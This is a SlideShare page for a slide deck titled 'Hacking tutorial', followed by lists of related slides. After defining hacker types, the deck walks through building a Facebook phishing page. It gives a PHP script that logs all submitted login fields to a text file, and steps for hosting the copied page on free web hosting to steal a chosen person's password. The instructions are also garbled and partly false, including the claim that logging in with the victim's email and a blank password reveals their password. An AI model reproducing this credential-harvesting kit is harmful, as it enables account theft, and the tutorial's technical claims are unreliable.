SlideShare a Scribd company logo
1 of 11
Hamza Shahid Mirza – Certified Ethical Hacker
Please note that this tutorial is for educational purposes only. If you learn
anything from it, please do not use it for malicious attacks or any other type of
illegal activity.
If you already to know how to hack using the real programming and hacking
techniques then please don’t use them as you will get traced by the cyber security
almost instantly and it can get you in a lot of trouble.
Hacking is the art of exploiting computers to get access to otherwise unauthorised
information. Now that the world is using IT systems to gather, store and manipulate
important information there is also a need to make sure that data is secure. However, no
system is without its problems.
There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers.
A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security
system or while working for a security company which makes security software.The term "white hat"
in Internet slang refers to an ethical hacker.
A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness
or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed
in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black
hat hackers break into secure networks to destroy data or make the network unusable for those who
are authorized to use the network.
A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may
surf the internet and hack into a computer system for the sole purpose of notifying the
administrator that their system has a security defect, for example.They may then offer to correct
the defect for a fee.
Here you will learn how to hack without having any knowledge of programming. In other
words, you will learn to hack using “Phishing technique”.
Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also
known as spoofed pages.These fake login pages resemble the original login pages of sites
like Yahoo, Gmail, paypal, ebay and Facebook etc.
The victim is fooled to believe the fake facebook page to be the real one and enter his/her
password. But once the user attempts to login through these pages, his/her facebook login
details are stolen away.
It is a very basic technique and it doesn’t require any knowledge of programming. I’ve
already written a code that you are going to need so just follow the steps and you’ll be able
to call yourself a ‘hacker’.
Go to the normal facebook login page which is www.facebook.com
Right click on the page and click ‘View page source’.
This page will open in a new tab when you click ‘View page source’.
Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the
‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you
find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it
to ‘post’. So that’s what it should end up looking like: “post = =
http://www.facebook.com/login.php?”.
When you’re done, save it as login.html.
Now open a new notepad file and type this code there:
<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?
This is the hacking code that I’ve written. Save it as code.php.
Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3
zero’s).And sign up by creating a create a subdomain.
For example, www.mynewwebsite.com.
Now go to your file manage on the homepage on the website and upload the 2 files that
you saved on your notepad. i.e. Login.html and code.php.
You must know the email address of the person you’re going to hack. Now try to login with
their email address and leave the password section blank. Once you’ve done it, their email
and passsword will be shown on your filemanager on the phishing website that you just
created.
It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a
lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of
people wonder ‘how to hack’.

More Related Content

Viewers also liked

Guitar lesson
Guitar lessonGuitar lesson
Guitar lessonizisiz
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An IntroductionJayaseelan Vejayon
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating SystemRaj Mohan
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithmsPiyush Rochwani
 

Viewers also liked (12)

Guitar lesson
Guitar lessonGuitar lesson
Guitar lesson
 
Page Replacement
Page ReplacementPage Replacement
Page Replacement
 
Paging and segmentation
Paging and segmentationPaging and segmentation
Paging and segmentation
 
Hacking
HackingHacking
Hacking
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An Introduction
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Paging and Segmentation in Operating System
Paging and Segmentation in Operating SystemPaging and Segmentation in Operating System
Paging and Segmentation in Operating System
 
Page replacement algorithms
Page replacement algorithmsPage replacement algorithms
Page replacement algorithms
 

Similar to Hacking tutorial. (20)

Phishing attack
Phishing attackPhishing attack
Phishing attack
 
Introduction to Hacking
Introduction to HackingIntroduction to Hacking
Introduction to Hacking
 
Basic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentationBasic ethical hacking for seminar presentation
Basic ethical hacking for seminar presentation
 
A presentation on Phishing
A presentation on PhishingA presentation on Phishing
A presentation on Phishing
 
Ethical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptxEthical hacking for Business or Management.pptx
Ethical hacking for Business or Management.pptx
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
Hacking & Hackers
Hacking & HackersHacking & Hackers
Hacking & Hackers
 
Ethical hacking 2016
Ethical hacking  2016 Ethical hacking  2016
Ethical hacking 2016
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Hacking
HackingHacking
Hacking
 
Kinds of hackers
Kinds of hackersKinds of hackers
Kinds of hackers
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical Hacking
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
All About Hacking..!!
All About Hacking..!!All About Hacking..!!
All About Hacking..!!
 
All About Hacking.!!
All About Hacking.!! All About Hacking.!!
All About Hacking.!!
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security
 
10.a guide-to-facebook-security
10.a guide-to-facebook-security10.a guide-to-facebook-security
10.a guide-to-facebook-security
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 

More from Ham'zzah Mir-zza (20)

Get started with hacking
Get started with hackingGet started with hacking
Get started with hacking
 
Activating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license keyActivating windows 7 without actually buying the license key
Activating windows 7 without actually buying the license key
 
Hacking with a keylogger.
Hacking with a keylogger.Hacking with a keylogger.
Hacking with a keylogger.
 
E6 logo Animation
E6 logo Animation E6 logo Animation
E6 logo Animation
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist
Ethical Checklist Ethical Checklist
Ethical Checklist
 
Ethical Checklist - E6 3D Logo
Ethical Checklist - E6 3D LogoEthical Checklist - E6 3D Logo
Ethical Checklist - E6 3D Logo
 
Production
ProductionProduction
Production
 
Final schedule 1
Final schedule 1Final schedule 1
Final schedule 1
 
Final schedule
Final scheduleFinal schedule
Final schedule
 
Final production log
Final production logFinal production log
Final production log
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 
3 d animation
3 d animation3 d animation
3 d animation
 
Gd02 collaboration agreement
Gd02 collaboration agreementGd02 collaboration agreement
Gd02 collaboration agreement
 
Project Charter
Project CharterProject Charter
Project Charter
 
Gd02 ethical checklist (1)
Gd02 ethical checklist (1)Gd02 ethical checklist (1)
Gd02 ethical checklist (1)
 
Pixel and resolution
Pixel and resolutionPixel and resolution
Pixel and resolution
 
Review
ReviewReview
Review
 
Figurative artists
Figurative artistsFigurative artists
Figurative artists
 
Fmp research1
Fmp research1Fmp research1
Fmp research1
 

Recently uploaded

Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptxMaritesTamaniVerdade
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfSherif Taha
 
Third Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxThird Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxAmita Gupta
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...christianmathematics
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxdhanalakshmis0310
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.pptRamjanShidvankar
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
Understanding Accommodations and Modifications
Understanding  Accommodations and ModificationsUnderstanding  Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric  nursing HISTORY  COLLECTION  .docxpsychiatric  nursing HISTORY  COLLECTION  .docx
psychiatric nursing HISTORY COLLECTION .docxPoojaSen20
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.MaryamAhmad92
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsMebane Rash
 

Recently uploaded (20)

Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 
Third Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxThird Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptx
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptx
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Understanding Accommodations and Modifications
Understanding  Accommodations and ModificationsUnderstanding  Accommodations and Modifications
Understanding Accommodations and Modifications
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric  nursing HISTORY  COLLECTION  .docxpsychiatric  nursing HISTORY  COLLECTION  .docx
psychiatric nursing HISTORY COLLECTION .docx
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 

Hacking tutorial.

  • 1. Hamza Shahid Mirza – Certified Ethical Hacker Please note that this tutorial is for educational purposes only. If you learn anything from it, please do not use it for malicious attacks or any other type of illegal activity. If you already to know how to hack using the real programming and hacking techniques then please don’t use them as you will get traced by the cyber security almost instantly and it can get you in a lot of trouble.
  • 2. Hacking is the art of exploiting computers to get access to otherwise unauthorised information. Now that the world is using IT systems to gather, store and manipulate important information there is also a need to make sure that data is secure. However, no system is without its problems.
  • 3. There are 3 types of hackers…White hat hackers, grey hat hackers and black hat hackers. A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software.The term "white hat" in Internet slang refers to an ethical hacker. A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[10] Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example.They may then offer to correct the defect for a fee.
  • 4. Here you will learn how to hack without having any knowledge of programming. In other words, you will learn to hack using “Phishing technique”. Phishing is the method for hacking passwords. It makes the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, paypal, ebay and Facebook etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. It is a very basic technique and it doesn’t require any knowledge of programming. I’ve already written a code that you are going to need so just follow the steps and you’ll be able to call yourself a ‘hacker’.
  • 5. Go to the normal facebook login page which is www.facebook.com Right click on the page and click ‘View page source’.
  • 6. This page will open in a new tab when you click ‘View page source’.
  • 7. Press ‘Ctrl + A’ to select everything on the page and the ‘Ctrl + C’ to copy.
  • 8. Open Notepad on your computer and paste the page that you copied by pressing ‘Ctrl +V’
  • 9. Now click ‘Edit’ on the top left corner of the notepad and click the ‘Find’ option and the ‘Find box’ will open up.Type ‘action’ in the ‘Find what’ bar and click ‘Find next’ until you find “action = http://www.facebook.com/login.php?”. Now select ‘action’ and change it to ‘post’. So that’s what it should end up looking like: “post = = http://www.facebook.com/login.php?”.
  • 10. When you’re done, save it as login.html. Now open a new notepad file and type this code there: <?php header ('Location:http://www.facebook.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ? This is the hacking code that I’ve written. Save it as code.php.
  • 11. Now the final step is to create a phishing website. Go to 000webhosting.com (ooo is 3 zero’s).And sign up by creating a create a subdomain. For example, www.mynewwebsite.com. Now go to your file manage on the homepage on the website and upload the 2 files that you saved on your notepad. i.e. Login.html and code.php. You must know the email address of the person you’re going to hack. Now try to login with their email address and leave the password section blank. Once you’ve done it, their email and passsword will be shown on your filemanager on the phishing website that you just created. It’s a very basic and safe technique to hack someone’s profile. Hacking someone anonymously takes a lot of programming skills and time. So that’s why I’ve shown you this technique because a lot of people wonder ‘how to hack’.